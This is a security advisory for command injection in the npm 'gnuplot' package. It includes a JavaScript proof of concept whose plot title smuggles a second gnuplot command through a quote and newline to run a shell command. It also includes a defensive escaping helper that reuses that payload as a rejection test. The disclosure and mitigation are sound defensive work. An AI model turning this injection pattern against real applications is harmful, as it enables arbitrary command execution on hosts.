GHSA-cfwc-xjfp-44jg: Command Injection in gnuplot

Severity: Critical

CVSS Score: 10

All versions of `gnuplot` are vulnerable to Command Injection. The package does not sanitize plot titles: the title is interpolated directly into the gnuplot script, so a value containing a double quote followed by a newline closes the string literal and starts a new gnuplot command. If the title is supplied by a user, an attacker can execute arbitrary commands on the host through gnuplot's `system()` function. The following proof-of-concept creates a `testing` file in the current directory:

```js
var gnuplot = require('gnuplot');

// The leading quote and newline terminate the `title` string; the next line
// is then parsed as its own gnuplot command, and `#` comments out the rest.
const title = '"\nset title system("touch testing")\n#';

gnuplot()
  .set('term png')
  .set('output "out.png"')
  .set(`title "${title}"`)
  .set('xrange [-10:10]')
  .set('yrange [-2:2]')
  .set('zeroaxis')
  .plot('(x/4)**2, sin(x), 1/x')
  .end();
```

## Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.
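Until the package is fixed, callers can refuse to pass an untrusted title through verbatim. The helper below is an added example, not code from the advisory or from the `gnuplot` package; it assumes the caller builds the `title ...` option string itself and places the value in a gnuplot single-quoted string, where doubling `'` is the only escape and control characters are rejected outright.

```javascript
'use strict';

// gnuplot single-quoted strings do not process backslash escapes; the only
// special sequence is '' for a literal single quote, so doubling quotes is a
// complete escape. A raw newline would end the command and let the remainder
// be parsed as a new `set ...` line, so control characters are refused.
function quoteGnuplotString(input) {
  if (typeof input !== 'string') {
    throw new TypeError('title must be a string');
  }
  // Reject C0 and C1 control characters (newline, carriage return, NUL, ...).
  if (/[\u0000-\u001f\u007f-\u009f]/.test(input)) {
    throw new Error('title contains control characters');
  }
  return "'" + input.replace(/'/g, "''") + "'";
}

// Builds the full `title ...` argument for gnuplot().set(...) (hypothetical
// wrapper name; the package itself offers no such helper).
function titleOption(input) {
  return 'title ' + quoteGnuplotString(input);
}

// Constructed inputs: an ordinary title, and the advisory's proof-of-concept
// payload, which the helper must reject rather than pass through.
const POC_TITLE = '"\nset title system("touch testing")\n#';

function demo() {
  const ok = titleOption("Bob's data (\"raw\")");
  let rejected = false;
  try {
    titleOption(POC_TITLE);
  } catch (e) {
    rejected = true;
  }
  return { ok, rejected };
}

console.log(demo());
```

A single-quoted title still goes through gnuplot's enhanced text processing (markup such as `_` and `^`), which affects only rendering; append `noenhanced` to the `set title` command if that is unwanted.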